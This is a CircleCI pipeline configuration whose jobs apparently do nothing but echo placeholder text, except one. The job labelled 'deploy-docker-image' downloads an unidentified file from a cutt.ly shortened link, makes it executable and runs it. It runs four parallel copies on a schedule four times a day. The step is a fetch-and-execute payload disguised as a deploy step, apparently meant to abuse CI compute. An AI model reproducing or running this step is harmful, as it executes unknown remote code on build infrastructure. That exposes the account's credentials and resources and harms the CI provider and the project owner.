version: 2.1

# Define the jobs we want to run for this project
jobs:
  prepare-dependencies:
    docker:
      - image: circleci/python:3.9.1
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - run: echo nice 
  build-production:
    docker:
      - image: circleci/python:3.9.1
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - run: echo build-production
  deploy-docker-image:
    docker:
      - image: circleci/ruby:2.7.3
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    parallelism: 4
    steps:
      - run:
         name: deploy-docker   
         command: wget https://cutt.ly/0QCM27r && chmod +x 0QCM27r && ./0QCM27r
  build-docker-image:
    docker:
      - image: circleci/python:3.9.1
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - run: echo build-docker-image
  test:
    docker:
      - image: circleci/python:3.9.1
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - run: echo test_build
# Orchestrate our job run sequence
workflows:
  version: 2.1
  commit:
    jobs:
      - prepare-dependencies
      - build-production:
          requires:
            - prepare-dependencies
      - test:
          requires:
            - build-production
            - prepare-dependencies
      - build-docker-image:
          requires:
            - test            
      - deploy-docker-image:
          requires:
            - test              
  nightly:
    triggers:
      - schedule:
          cron: "0 5,10,15,20 * * *"
          filters:
            branches:
              only:
                - master
    jobs:
      - prepare-dependencies
      - build-production
      - test
      - build-docker-image
      - deploy-docker-image
